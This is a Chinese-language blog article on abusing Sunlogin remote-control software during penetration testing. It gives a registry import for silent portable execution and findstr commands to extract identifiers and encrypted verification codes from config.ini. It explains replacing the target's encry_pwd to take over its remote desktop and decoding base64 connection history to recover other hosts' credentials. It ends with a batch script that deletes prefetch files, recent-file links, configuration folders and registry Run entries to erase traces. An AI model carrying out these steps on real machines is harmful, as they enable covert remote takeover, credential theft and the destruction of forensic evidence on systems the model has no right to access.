向日葵软件在渗透测试中的应用

2022-09-22 09:47:18 浏览数 (1)

声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

0x01 向日葵简介

向日葵远程控制软件是一款免费的集远程控制电脑/手机/平板、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件,且还能进行远程文件传输、远程摄像头监控等。

  • 支持系统:Winodws/Linux/MacOS/Android/iOS

0x02 向日葵安装

向日葵在首次执行时会出现UAC弹窗和安装界面,且不支持静默安装,所以没办法直接执行我们上传的向日葵,不过可以自己编写模拟鼠标点击程序来实现执行绿色版。

使用Procmon64程序监控向日葵进程发现执行“免安装,以绿色版运行”时查询的一个注册表值对应着我们运行的版本,所以只要SunloginClient注册表项中有对应的版本即可实现免安装运行。可通过regedit -s命令导入以下注册表即可,注意权限问题。

代码语言:javascript复制
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USERSOFTWAREOraySunLoginSunloginClient]
"Oray_set_wizarddialog_need_show"="1"
"Oray_have_no_account_loged"="1"
"10.5.0.29613_IsRunSeted"="1"
"11.0.0.33826_IsRunSeted"="1"

0x03 场景1:替换目标连接密码

运行向日葵的免安装版后会在C:ProgramDataOraySunloginClient默认路径下生成config.ini配置文件,也可以通过以下命令获取其他安装路径,这个文件存储着我们需要的fastcode:本机识别码,encry_pwd:本机验证码,密文无法直接解密。

代码语言:javascript复制
findstr /si /n encry_pwd= c:config.ini
findstr /si /n fastcode= c:config.ini
findstr /si /n fastcodehistroy= c:config.ini

但我们可以直接修改或下载目标机器的config.ini,将encry_pwd密文内容替换为我们本机验证码密文,低版本可以设置“自定义验证码”,然后上传覆盖至目标机器,接着使用目标识别码和本地验证码进行连接即可进入目标远程桌面。

注:当目标机器开启Windows UAC时config.ini文件可能没权限修改,也无法更改config.ini文件权限。

0x04 场景2:获取历史连接记录

config.ini配置文件中的fastcodehistroy值以base64编码形式存储着向日葵历史连接记录,可以直接通过解码得知所有历史连接记录的识别码和验证码。

0x05 可能需要清理的向日葵痕迹

代码语言:javascript复制
@echo off
taskkill /f /im SunloginClient.exe
del /s /q C:WindowsPrefetchSUNLOGINCLIENT*.pf
del /s /q %userprofile%AppDataRoamingMicrosoftWindowsRecentSunloginClient*.lnk
rmdir /s /q C:ProgramDataOraySunloginClient
rmdir /s /q %userprofile%AppDataRoamingOraySunloginClient
reg delete "HKCUSoftwareOraySunLoginSunloginClient" /f
reg delete "HKLMSOFTWAREWOW6432NodeMicrosoftWindowsCurrentVersionRun" /v SunloginClient /f
del /s /q SunloginClient.exe
[...SNIP...]

0 人点赞